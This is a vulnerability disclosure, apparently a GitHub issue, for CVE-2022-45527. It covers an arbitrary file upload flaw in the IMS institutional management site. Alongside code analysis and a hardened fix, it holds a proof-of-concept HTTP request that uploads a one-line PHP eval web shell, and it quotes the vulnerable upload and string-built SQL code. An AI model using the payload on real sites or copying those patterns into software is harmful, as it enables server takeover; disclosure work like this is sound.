CVE-2022-45527: IMS has an arbitrary file upload vulnerability · Issue #2 · Future-Depth/IMS
File upload vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows unauthorized attackers to directly upload malicious files to the courseimg directory.
Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

1. File upload vulnerability

In the file admin_area/courseinsert.php, lines 234-239:
```html
<table border='2' align="center">
<form method="post" action="course_insert.php" enctype="multipart/form-data">
  <tr><td>COURSE NAME : </td><td><input type="text" name="cname" required="" autocomplete="off"></td></tr>
  <tr><td>DURATION : </td><td><input type="text" name="drn" required="" autocomplete="off"></td></tr>
  <tr><td>FEES : </td><td><input type="text" name="fee" required="" autocomplete="off"></td></tr>
  <tr><td>UPLOAD PHOTO :</td><td><input type="file" name="pht" required="" autocomplete="off"></td></tr>
  <tr><td></td><td><button class="btn btn-primary btn-lg">Insert Course</button></td></tr>
</form>
</table>
```
After entering the information, clicking the button sends it by POST to course_insert.php. Following the code further:
course_insert.php:
In lines 10-13:

```php
$fname=$_FILES['pht']['name'];                 // client-supplied filename, used as-is
$file_temp_loc=$_FILES['pht']['tmp_name'];
$file_store="courseimg/".$fname;               // destination built from the original name
move_uploaded_file($file_temp_loc,$file_store); // no type, extension or name check before storing
```
$_FILES holds the information about the file uploaded by POST, and $file_store defines where the file will be stored. Nowhere in this process is the uploaded file's type verified: move_uploaded_file() transfers every uploaded file, whatever its type or name, into the courseimg/ directory.
In lines 14 to 28:

```php
$s=mysqli_query($con,"insert into course(c_name,duration,fees,photo) values('$cname','$drn','$fee','$file_store')");
if($s==1)
{
    $t=mysqli_query($con,"select * from course where c_name='$cname'");
    $r=mysqli_fetch_array($t);
    $id=$r['id'];
    $i=100+$id;
    $uid="BTT/CRS/".$i;
    $udt=mysqli_query($con,"update course set c_id='$uid' where c_name='$cname'");
    header("location:courseinsert.php?ms=done");
}
else
{
    header("location:courseinsert.php?ms=not_done");
}
```
mysqli_query() returns the result of executing the database statement, so $s holds the return value of the insert. If the statement succeeds it returns true, so $s==1 and, once the new row is in the database, the page redirects to courseinsert.php?ms=done; otherwise it redirects to courseinsert.php?ms=not_done.
To sum up, the upload handler first writes the file into the local courseimg directory and only then saves the path of the stored file in the database.
Therefore, even if the database insert fails and no path is stored, the uploaded file has already been saved in the courseimg/ directory under the current path, i.e. admin_area/courseimg/.
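For comparison, here is a hardened replacement for the upload section of course_insert.php (lines 10-13). This is an added example and not code from the Future-Depth/IMS project; it assumes the same $_FILES['pht'] form field and the same courseimg/ target directory as the original, and the 2 MiB size limit and the allowed image types are assumed values chosen for the example. It rejects the file unless the bytes themselves parse as an image, and it never uses the client-supplied filename on disk, so a request like the one below (filename="ace.php" with a PHP body) is refused instead of stored:

```php
<?php
// Hardened upload handling for course_insert.php (added example, not project code).
// Assumes the same form field ($_FILES['pht']) and target directory (courseimg/).

const COURSEIMG_DIR       = __DIR__ . '/courseimg';
const MAX_PHOTO_BYTES     = 2 * 1024 * 1024;   // assumed limit for the example: 2 MiB
const ALLOWED_IMAGE_TYPES = [                  // MIME type detected from content => extension used on disk
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate the uploaded course photo and store it under a server-chosen name.
 * Returns the relative path to save in the database, or null if the file is rejected.
 */
function store_course_photo(array $file): ?string
{
    // 1. The upload must have completed and must really be a PHP-managed upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 2. Enforce a size limit independent of php.ini settings.
    if ($file['size'] > MAX_PHOTO_BYTES) {
        return null;
    }

    // 3. Decide the type from the file's bytes, never from the client-supplied
    //    name or Content-Type header: a .php file full of PHP code is not an image.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }
    // The file must also decode as an image, not merely carry matching magic bytes.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // 4. Generate the on-disk name on the server: the original name, including any
    //    extension or path it carries, is discarded.
    $ext       = ALLOWED_IMAGE_TYPES[$mime];
    $storeName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest      = COURSEIMG_DIR . '/' . $storeName;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // readable by the web server, never executable
    return 'courseimg/' . $storeName;
}

// Usage in course_insert.php, replacing the original lines 10-13:
$file_store = store_course_photo($_FILES['pht'] ?? []);
if ($file_store === null) {
    header('Location: courseinsert.php?ms=not_done');
    exit;
}
// $file_store now holds a server-generated image path for the database insert.
```

Two further mitigations belong alongside this check: course_insert.php sits under admin_area/, so it should verify an authenticated administrator session before touching $_FILES at all, and the courseimg/ directory should have script execution disabled at the web-server level (for Apache, an .htaccess with `php_flag engine off`, or a `<FilesMatch>` block that denies requests for `.php` files in that directory) so that even a file that slips past validation is served as static content rather than executed.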
Upload-POC:
```http
POST /admin_area/course_insert.php HTTP/1.1
Host: imsvul.test
Content-Length: 500
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://imsvul.test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1EAN9nvnAL0aI3UM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://imsvul.test/admin_area/courseinsert.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=i7acqqkl9acdrrrhcbtdtvis5a
Connection: close

------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="cname"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="drn"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="fee"

ace
------WebKitFormBoundary1EAN9nvnAL0aI3UM
Content-Disposition: form-data; name="pht"; filename="ace.php"
Content-Type: application/octet-stream

<?php eval($_POST["ace"]);?>
------WebKitFormBoundary1EAN9nvnAL0aI3UM--
```
After sending the POC packet, a PHP file named ace.php is generated in the admin_area/courseimg/ directory.
It can then be connected to with a webshell management tool.